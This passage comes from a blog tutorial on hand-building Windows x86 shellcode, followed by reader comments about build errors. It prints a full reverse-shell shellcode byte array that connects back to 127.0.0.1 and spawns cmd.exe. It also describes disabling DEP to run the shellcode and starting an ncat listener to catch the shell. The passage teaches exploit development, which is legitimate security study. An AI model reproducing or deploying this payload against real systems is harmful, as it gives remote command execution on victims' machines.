"\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
"\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
"\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
"\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
"\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
"\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
"\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
"\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
"\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
"\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
"\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
"\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
"\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
"\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
"\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
"\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
"\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
"\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
"\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
"\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
"\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
"\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
"\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
"\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
"\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
"\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
"\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
"\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
"\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
"\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

The part about relocations is very important, because you can check if everything is OK. For example, we know that our reverse shell uses 3 strings and they were all correctly extracted from the .rdata section. We can see that the original shellcode was 614 bytes and the resulting shellcode (after handling relocations and null bytes) is 715 bytes.

Now we need to run the resulting shellcode in some way. The script gives us the shellcode in C/C++ format, so we just need to copy and paste it in a small C/C++ file. Here’s the complete source code:

To make this code work, you need to disable DEP (Data Execution Prevention) by going to Project<solution name> Properties and then, under Configuration Properties, Linker and Advanced, set Data Execution Prevention (DEP) to No (/NXCOMPAT:NO). This is needed because our shellcode will be executed from the heap which wouldn’t be executable with DEP activated.

static_assert was introduced with C++11 (so VS 2013 CTP is required) and here is used to check that you use

instead of

In the first case, sizeof(shellcode) is the effective length of the shellcode and the shellcode is copied onto the stack. In the second case, sizeof(shellcode) is just the size of the pointer (i.e. 4) and the pointer points to the shellcode in the .rdata section.

To test the shellcode, just open a cmd shell and enter

ncat -lvp 123

Then, run the shellcode and see if it works.

The following two tabs change content below.

Massimiliano Tomassoli

Computer scientist, software developer, reverse engineer and student of computer security (+ piano player & music composer)

Latest posts by Massimiliano Tomassoli (see all)

Leave a Reply

14 Comments on "Shellcode"

Notify of

Sort by:   newest | oldest | most voted
Guest
Anonymous
10 months 6 days ago

when call the shellcode in new program,it correpted. becouse your python code only get the function “main” as the shellcode ,but ,there are other sections,such as getProcAddrByHash ,they are not in “main” function,so ,your shell code is not long enougth.

Guest
Matthew
1 year 2 months ago

Hello friends
After carefully following all your instructions on how to set up the compiler and linker I receive the error:
LNK1104: cannot open file function_order.txt
I have gone onto various sites on the itnernet to research this problem however I have no such luck finding a solution.
I am on windows 7 Ultimate SP1 running visual studio 2013.
Any help would be appreciated.

Guest
ZION
1 year 3 months ago

Hello 🙂
Good morning, the following shellcode.cpp will not compile I checked if I set the project properties correct and I did, i’m assuming it’s an issue with the win-stock library ?

Guest
Begineer
1 year 4 months ago

Hello:)
Can you write x86_64 version,I dont know how to rewrite the python script.
Or can you give me some hint
THANK YOU

Guest
n0b0dy
1 year 4 months ago

Hi I’m having a problem when I use the python script:

Extracting shellcode length from “mapfile”…
shellcode length: 665
Extracting shellcode from “shellcode.exe” and analyzing relocations…
[!] get_shellcode: shellcode references a section other than .rdata

can you help?

wpDiscuz